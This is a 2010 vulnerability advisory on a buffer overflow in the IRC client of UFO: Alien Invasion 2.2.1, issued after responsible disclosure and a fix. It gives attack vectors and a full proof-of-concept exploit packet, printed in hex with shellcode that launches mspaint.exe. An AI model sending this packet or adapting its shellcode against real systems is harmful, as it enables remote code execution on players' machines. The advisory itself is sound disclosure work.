Remote Arbitrary Code Execution Vulnerability in UFO: Alien Invasion -------------------------------------------------------------------- June 18th, 2010 ======= Summary ======= Name: Remote Arbitrary Code Execution Vulnerability in UFO: Alien Invasion Release Date: June 18th, 2010 Discoverer: Jason Geffner Version Affected: UFO: Alien Invasion 2.2.1 (version previous to UFO: Alien Invasion 2.2.1 not tested) Risk: Very High Status: Published ============ Introduction ============ This paper discusses how an unprivileged remote attacker can execute arbitrary code on networked players' computers. This vulnerability was responsibly disclosed to the UFO: Alien Invasion project leader and this advisory was not released until a stable fixed build of the game was released. ========== Background ========== "UFO: Alien Invasion is an open source strategy video game in which the player fights aliens that are trying to take control of the Earth. The game is heavily influenced by the X-COM series (mostly by UFO: Enemy Unknown). It is based on a modified id Tech 2 engine, and runs on Linux, Microsoft Windows, and Mac OS X for both PPC and Intel Macs. UFO:AI has been nominated for 'Best project for Gamers' in the Sourceforge 2007 and 2008 Community Choice Awards and was positively noted by Linux Journal." [1] ======== Timeline ======== 04/29/08 UFO: Alien Invasion 2.2.1 released 10/28/09 Remote arbitrary code execution vulnerability discovered in UFO: Alien Invasion 2.2.1 10/31/09 Detailed vulnerability report responsibly disclosed to the UFO: Alien Invasion project leader 11/02/09 Fix checked into source code trunk 06/18/10 Stable build of UFO: Alien Invasion 2.3 released, fixing vulnerability 06/18/10 Advisory released ============= Vulnerability ============= The IRC client component of UFO: Alien Invasion 2.2.1 contains multiple security vulnerabilities that allow a malicious IRC server to remotely execute arbitrary code on the client's system. There are numerous ways that an attacker could cause a player to connect to a malicious server, for example: - Perform a man-in-the-middle attack to inject IRC server responses into the TCP stream. - Use DNS poisoning to redirect the player's client from the real irc.freenode.org server to the attacker's malicious server. - Use the in-game "rcon" functionality against a server to remotely issue the command "irc_connect " (passwords for rcon can be brute-forced and/or sniffed over the network since they're sent in plaintext). - Use social engineering to convince a player to press ~ and type "irc_connect ". There are numerous buffer overflow vulnerabilities that can be exploited in the IRC client component. The following vulnerability can be exploited in a single packet: The Irc_Proto_ParseServerMsg(...) function parses server messages of up to 1024 bytes in length and writes to an irc_server_msg_t structure. This structure's last field is a 512-byte string buffer. A malformed server response can cause Irc_Proto_ParseServerMsg(...) to write past the end of the irc_server_msg_t structure and overwrite the return address for Irc_Logic_ReadMessages(...). ======= Exploit ======= See below for a proof-of-concept exploit packet for UFO: Alien Invasion 2.2.1 for Windows. The payload will launch "mspaint.exe" and terminate the UFO: Alien Invasion process. 00000000: 30 30 31 20 3a 41 41 41 41 41 41 41 41 41 41 41 001 :AAAAAAAAAAA 00000010: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000020: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000030: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000040: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000050: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000060: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000070: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000080: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000090: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000000a0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000000b0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000000c0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000000d0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000000e0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000000f0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000100: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000110: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000120: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000130: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000140: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000150: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000160: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000170: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000180: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000190: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000001a0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000001b0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000001c0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000001d0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000001e0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000001f0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000200: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000210: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000220: 41 41 41 41 41 41 41 41 41 41 41 41 41 28 50 d2 AAAAAAAAAAAAA(P. 00000230: 0a 2b c9 83 e9 cd e8 ff ff ff ff c0 5e 81 76 0e .+..........^.v. 00000240: 76 83 85 b6 83 ee fc e2 f4 8a 6b 0c b6 76 83 e5 v.........k..v.. 00000250: 3f 93 b2 57 d2 fd d1 b5 3d 24 8f 0e e4 62 08 f7 ?..W....=$...b.. 00000260: 9e 79 34 cf 90 47 7c b4 76 da bf e4 ca 74 af a5 .y4..G|.v....t.. 00000270: 77 b9 8e 84 71 94 73 d7 e1 fd d1 95 3d 34 bf 84 w...q.s.....=4.. 00000280: 66 fd c3 fd 33 b6 f7 cf b7 a6 d3 0e fe 6e 08 dd f...3........n.. 00000290: 96 77 50 66 8a 3f 08 b1 3d 77 55 b4 49 47 43 29 .wPf.?..=wU.IGC) 000002a0: 77 b9 8e 84 71 4e 63 f0 42 75 fe 7d 8d 0b a7 f0 w...qNc.Bu.}.... 000002b0: 54 2e 08 dd 92 77 50 e3 3d 7a c8 0e ee 6a 82 56 T....wP.=z...j.V 000002c0: 3d 72 08 84 66 ff c7 a1 92 2d d8 e4 ef 2c d2 7a =r..f....-...,.z 000002d0: 56 2e dc df 3d 64 68 03 eb 1c 82 08 33 cf 83 85 V...=dh.....3... 000002e0: b6 26 eb b4 3d 19 04 7a 63 cd 73 30 14 20 eb 23 .&..=..zc.s0. .# 000002f0: 23 cb 1e 7a 63 4a 85 f9 bc f6 78 65 c3 73 38 c2 #..zcJ....xe.s8. 00000300: a5 04 ec ef b6 25 7c 50 db 05 f3 e4 df 18 f7 ab .....%|P........ 00000310: d3 0e e6 85 b6 0d 0a ....... ========== Conclusion ========== Safe string handling functions should be used instead of their standard CRT equivalents or inlined string copies. =============== Fix Information =============== This issue has now been resolved. UFO: Alien Invasion 2.3 can be downloaded from http://ufoai.ninex.info/wiki/index.php/Download ========== References ========== [1] http://en.wikipedia.org/wiki/UFO:_Alien_Invasion NGSSoftware Insight Security Research http://www.ngssoftware.com/ http://www.databasesecurity.com/ http://www.nextgenss.com/ +44(0)208 401 0070